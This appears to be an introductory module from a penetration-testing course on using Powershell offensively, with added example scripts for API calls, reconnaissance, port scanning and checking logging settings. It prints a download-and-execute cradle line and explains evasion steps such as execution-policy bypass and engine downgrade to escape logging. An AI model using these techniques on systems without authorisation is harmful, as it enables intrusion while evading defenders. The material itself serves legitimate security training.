
Section 3 Module 1 Introduction

1.1 Why Powershell?
1.2 What IS Powershell?
Penetration Testing Professional 5.0 – Caendra Inc. © 2018
By the end of this module, you should have a better understanding of:
✓ The benefits of utilizing Powershell for penetration tests.
✓ What Powershell is at a high level.
Powershell is a powerful built-in shell and scripting environment that we can utilize as penetration testers, considering its widespread availability on all modern Windows-based systems.
https://en.wikipedia.org/wiki/PowerShell
The use of Powershell allows us to take advantage of the "living off the land" concept: once we've obtained access to a system, tools that are already built into the operating system work to our advantage, because we don't need to bring and drop binaries of our own.
https://www.secureworks.com/blog/living-off-the-land
There are many advantages to using Powershell as it relates to penetration testing, some of them being:
• Many organizations aren't actively hunting for Powershell activity, since it is usually considered a "trusted" administrative application (a situation that is changing as Powershell logging improves, as we'll see later in this module).
• We can use Powershell to download and execute code entirely within the memory of the Powershell process, without writing anything to disk, which helps us evade endpoint security solutions that rely on scanning files.
• We can use it to interface with the .NET Framework and other Windows APIs.
Advantages (continued):
• We can call exported Windows DLL functions (the Win32 API) directly from within Powershell.
• Because powershell.exe is a signed Microsoft binary that application whitelisting implementations usually allow to run, we can often use it to execute our code and the usual operating system commands from the Powershell CLI on hosts where unsigned or unknown executables would be blocked.
• Many tools are already available to us for a large number of purposes related to penetration testing, PowerSploit being a well-known example:
https://github.com/PowerShellMafia/PowerSploit
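The following is an added example, not code from the course or from PowerSploit, that shows three of the capabilities listed above in a single session: calling the .NET Framework API, calling exported kernel32.dll functions, and executing script text that never exists as a .ps1 on disk. The script text in part 3 is a constructed stand-in for what a download cradle would fetch, so the example runs offline; the cradle URL in the comment is a placeholder.

```powershell
# Added example, not from the course material: three of the capabilities above in one session.

# 1. .NET Framework API: local listening TCP sockets straight from the framework,
#    with no netstat.exe child process for an endpoint agent to notice.
$ipProps = [System.Net.NetworkInformation.IPGlobalProperties]::GetIPGlobalProperties()
$ipProps.GetActiveTcpListeners() | Sort-Object Port | Select-Object Address, Port

# 2. Calling exported Windows DLL functions. Add-Type compiles the C# P/Invoke stubs below
#    and returns the resulting type; both exports really exist in kernel32.dll.
#    Caveat: Add-Type runs csc.exe and drops temporary .cs/.dll files under %TEMP%, so this
#    part is not truly disk-less. PowerSploit's PSReflect builds the same stubs with
#    System.Reflection.Emit to avoid that.
$signature = @'
[DllImport("kernel32.dll")]
public static extern uint GetCurrentProcessId();
[DllImport("kernel32.dll")]
public static extern bool IsDebuggerPresent();
'@
$Kernel32 = Add-Type -MemberDefinition $signature -Name 'Kernel32' -Namespace 'Win32' -PassThru
'PID from kernel32!GetCurrentProcessId: {0}' -f $Kernel32::GetCurrentProcessId()
'Debugger attached (kernel32!IsDebuggerPresent): {0}' -f $Kernel32::IsDebuggerPresent()

# 3. In-memory execution. A download cradle such as
#      IEX (New-Object Net.WebClient).DownloadString('http://<your-host>/script.ps1')
#    pulls script text into memory and hands it to Invoke-Expression (IEX). The constructed
#    string below stands in for that download so the example runs offline; nothing is saved
#    as a .ps1 file.
$scriptText = @'
function Get-CurrentUserInfo {
    $id = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $principal = New-Object System.Security.Principal.WindowsPrincipal($id)
    $isAdmin = $principal.IsInRole([System.Security.Principal.WindowsBuiltInRole]::Administrator)
    New-Object PSObject -Property @{ User = $id.Name; IsAdmin = $isAdmin; Host = $env:COMPUTERNAME }
}
Get-CurrentUserInfo
'@
Invoke-Expression $scriptText
```

Everything here works on Powershell 2.0 and later. Keep in mind that "in memory" describes the script, not necessarily what Powershell does with it: from version 5.0 onward, script block logging can record the text passed to Invoke-Expression, which is exactly why the version of the engine you land on matters, as discussed later in this module.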
Having access to all of those things through Powershell helps us reduce our footprint and evade defense mechanisms while conducting post-exploitation tasks.
Powershell is also easy to use, and there are many scripts and frameworks already written that we can utilize for our offensive purposes. Furthermore, it doesn't take much to create our own scripts to carry out some of our tasks, as we'll see in the modules that follow.
Powershell is a powerful built-in Command Line Interpreter, or "shell," and task-oriented scripting language environment found on most current Windows Operating Systems. It has shipped by default since Windows 7 and Windows Server 2008 R2 (on Windows XP, Vista, Server 2003 and Server 2008 it was available as an optional install).
https://en.wikipedia.org/wiki/PowerShell
https://en.wikipedia.org/wiki/Command-line_interface#Command-line_interpreter
Powershell is typically used by administrators, as it provides great functionality and flexibility for managing Windows systems and automating tasks, which is largely why it is such a good fit for our process as penetration testers.
Powershell is tightly integrated with the .NET Framework (it is actually built on top of it).
It also provides convenient access to the .NET Framework API, the Component Object Model (COM) and Windows Management Instrumentation (WMI), which is another plus in regard to persistence methods and ways we can gather information, as we'll see later.
https://en.wikipedia.org/wiki/.NET_Framework
https://en.wikipedia.org/wiki/Component_Object_Model
https://en.wikipedia.org/wiki/Windows_Management_Instrumentation
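As an added example (not the course's own code), the function below uses all three interfaces named above from one prompt for basic host reconnaissance: the .NET Framework API for OS and CLR versions, a COM object (WScript.Network) for the logon context, and WMI for domain membership, local administrators and registered antivirus products. The function name is ours; every class and property it touches is a standard Windows interface.

```powershell
# Added example, not from the course: .NET, COM and WMI used together for host reconnaissance.
# Get-WmiObject is used rather than Get-CimInstance because the latter only appeared in
# Powershell 3.0, and this module mostly assumes version 2.0.

function Get-HostRecon {
    # .NET Framework API: OS and CLR versions straight from System.Environment.
    $osVersion  = [System.Environment]::OSVersion.VersionString
    $clrVersion = [System.Environment]::Version.ToString()

    # COM: WScript.Network exposes the logon user, domain and computer name
    # without spawning whoami.exe.
    $net = New-Object -ComObject WScript.Network

    # WMI: domain membership and the members of the local Administrators group.
    $cs = Get-WmiObject -Class Win32_ComputerSystem
    $admins = Get-WmiObject -Class Win32_GroupUser |
        Where-Object { $_.GroupComponent -match 'Name="Administrators"' } |
        ForEach-Object {
            # PartComponent looks like: \\HOST\root\cimv2:Win32_UserAccount.Domain="HOST",Name="bob"
            if ($_.PartComponent -match 'Domain="([^"]+)",Name="([^"]+)"') {
                '{0}\{1}' -f $Matches[1], $Matches[2]
            }
        }

    # WMI: antivirus products registered with Security Center (workstation SKUs only;
    # the namespace does not exist on servers, hence the silenced error).
    $av = Get-WmiObject -Namespace 'root\SecurityCenter2' -Class AntiVirusProduct `
        -ErrorAction SilentlyContinue | ForEach-Object { $_.displayName }

    New-Object PSObject -Property @{
        Host         = $net.ComputerName
        LogonDomain  = $net.UserDomain
        User         = $net.UserName
        PartOfDomain = $cs.PartOfDomain
        ADDomain     = $cs.Domain
        OSVersion    = $osVersion
        CLRVersion   = $clrVersion
        LocalAdmins  = $admins
        AntiVirus    = $av
    }
}

Get-HostRecon | Format-List
```

Note that WMI queries such as Win32_GroupUser are cheap to run but are also visible to defenders; on systems with WMI activity tracing or Sysmon's WMI events enabled, the same interface that helps us gather information also leaves a record.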
Most of the time, we'll be working either with scripts, commonly identified by the ".ps1" file extension, or with what are known as "cmdlets" (native Powershell commands, of which we can also create our own); at other times we'll be interacting with the system directly via the Powershell CLI.
https://msdn.microsoft.com/en-us/library/ms714395(v=vs.85).aspx
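To make the script/cmdlet/CLI distinction concrete, here is an added example (not from the course) of a cmdlet we could write ourselves as a script-based "advanced function": a small TCP connect scanner built on the .NET TcpClient class. The function name and the port list are our own choices.

```powershell
# Added example, not from the course: a script-based cmdlet (an "advanced function") that you
# can keep in a .ps1 file or paste straight into the CLI. It performs a TCP connect scan with
# an explicit timeout, so closed or filtered ports do not hang the scan.

function Test-TcpPort {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory=$true, Position=0)]
        [string]$ComputerName,

        # ValueFromPipeline lets the function consume a list of ports like a native cmdlet.
        [Parameter(Mandatory=$true, ValueFromPipeline=$true)]
        [int[]]$Port,

        [int]$TimeoutMs = 500
    )
    process {
        foreach ($p in $Port) {
            $client = New-Object System.Net.Sockets.TcpClient
            $open = $false
            try {
                # Asynchronous connect so that we control the timeout ourselves.
                $ar = $client.BeginConnect($ComputerName, $p, $null, $null)
                if ($ar.AsyncWaitHandle.WaitOne($TimeoutMs, $false)) {
                    $client.EndConnect($ar)   # throws if the connection was refused
                    $open = $true
                }
            } catch {
                $open = $false
            } finally {
                $client.Close()
            }
            New-Object PSObject -Property @{ ComputerName = $ComputerName; Port = $p; Open = $open }
        }
    }
}

# Usage. Saved as Test-TcpPort.ps1 the function is loaded by dot-sourcing; pasted at the CLI it
# is defined directly in the session. Either way it is then called like any other cmdlet:
#   . .\Test-TcpPort.ps1
#   22,80,135,139,445,3389 | Test-TcpPort -ComputerName 127.0.0.1 | Where-Object { $_.Open }
135,445 | Test-TcpPort -ComputerName 127.0.0.1
```

Running a .ps1 file, including dot-sourcing it, is subject to the execution policy, whereas text typed or pasted at the CLI is not; `powershell.exe -ExecutionPolicy Bypass` is the usual way around that, and it is one reason the CLI route comes up so often in post-exploitation.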
An important point to note as we navigate through the upcoming topics is that more recent versions of Powershell, specifically 5.0 and onward, introduce some potential hurdles in regards to detection, logging (script block logging, module logging and transcription) and more restrictive modes (Constrained Language Mode), which we will cover workarounds for briefly.
For the most part, we will be working with version 1.0 or 2.0.
https://en.wikipedia.org/wiki/PowerShell#Versions
https://www.crowdstrike.com/blog/investigating-powershell-command-and-script-logging/
https://blogs.msdn.microsoft.com/powershell/2017/11/02/powershell-constrained-language-mode/
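Before relying on any of the techniques in this section it pays to check which engine you are running in and which of the controls just mentioned are enforced. The function below is an added example, not part of the course: it reads the Group Policy registry locations Windows uses for these settings (a missing value means the policy is not configured) and reports the session's version, language mode and execution policy. The function and property names are ours.

```powershell
# Added example, not from the course: a quick posture check for the logging and
# restriction features introduced around Powershell 5.0.

function Get-PowerShellPosture {
    $policyRoot = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'

    # Reads one policy value; $null means the setting is not configured at all.
    function Read-PolicyValue([string]$SubKey, [string]$Name) {
        $item = Get-ItemProperty -Path (Join-Path $policyRoot $SubKey) -Name $Name `
            -ErrorAction SilentlyContinue
        if ($item) { [int]$item.$Name } else { $null }
    }

    # The v2 engine registers under ...\PowerShell\1, v3 and later under ...\PowerShell\3.
    # Presence of the v2 registration suggests (but does not guarantee, .NET 3.5 is also
    # needed) that "powershell.exe -Version 2" will start the older engine.
    $v2 = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine' `
        -ErrorAction SilentlyContinue

    New-Object PSObject -Property @{
        EngineVersion      = $PSVersionTable.PSVersion.ToString()
        LanguageMode       = $ExecutionContext.SessionState.LanguageMode.ToString()
        ExecutionPolicy    = (Get-ExecutionPolicy).ToString()
        ScriptBlockLogging = Read-PolicyValue 'ScriptBlockLogging' 'EnableScriptBlockLogging'
        ModuleLogging      = Read-PolicyValue 'ModuleLogging'      'EnableModuleLogging'
        Transcription      = Read-PolicyValue 'Transcription'      'EnableTranscripting'
        V2EngineRegistered = ($v2 -ne $null -and $v2.PowerShellVersion -eq '2.0')
    }
}

Get-PowerShellPosture | Format-List
```

A LanguageMode of ConstrainedLanguage means Add-Type, COM objects and most .NET method calls from the earlier examples will fail, and a value of 1 for ScriptBlockLogging means the text of every script block, including anything passed to Invoke-Expression, is written to the Microsoft-Windows-PowerShell/Operational log. Falling back to the v2 engine where it is still present sidesteps both, which is why the module mostly targets version 2.0; be aware that defenders watch for exactly that (the engine start event in the Windows PowerShell log records the engine version).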
Advancements in the "freedom" of Powershell:
In 2016, Powershell 6.0 (Powershell Core) was made available as an open source project, and it is available for several different platforms, including some major Linux distributions and macOS, and also as a Docker container image.
You can learn more about open source Powershell, and download it, from the following GitHub page:
https://github.com/powershell/powershell
https://blogs.msdn.microsoft.com/powershell/2018/01/10/powershell-core-6-0-generally-available-ga-and-supported/
This concludes the Powershell For Pentesters Introduction Module.
In this module, we covered:
✓ A brief introduction as to why Powershell is a great tool for our purposes.
✓ A high-level overview of Powershell.
References
Powershell: https://en.wikipedia.org/wiki/PowerShell
Living Off The Land: https://www.secureworks.com/blog/living-off-the-land
Command Line Interpreter: https://en.wikipedia.org/wiki/Command-line_interface#Command-line_interpreter
.NET Framework: https://en.wikipedia.org/wiki/.NET_Framework
Component Object Model: https://en.wikipedia.org/wiki/Component_Object_Model
Windows Management Instrumentation: https://en.wikipedia.org/wiki/Windows_Management_Instrumentation
Cmdlets: https://msdn.microsoft.com/en-us/library/ms714395(v=vs.85).aspx
Powershell Versions: https://en.wikipedia.org/wiki/PowerShell#Versions
Constrained Language Mode: https://blogs.msdn.microsoft.com/powershell/2017/11/02/powershell-constrained-language-mode/
Script Block Logging: https://www.crowdstrike.com/blog/investigating-powershell-command-and-script-logging/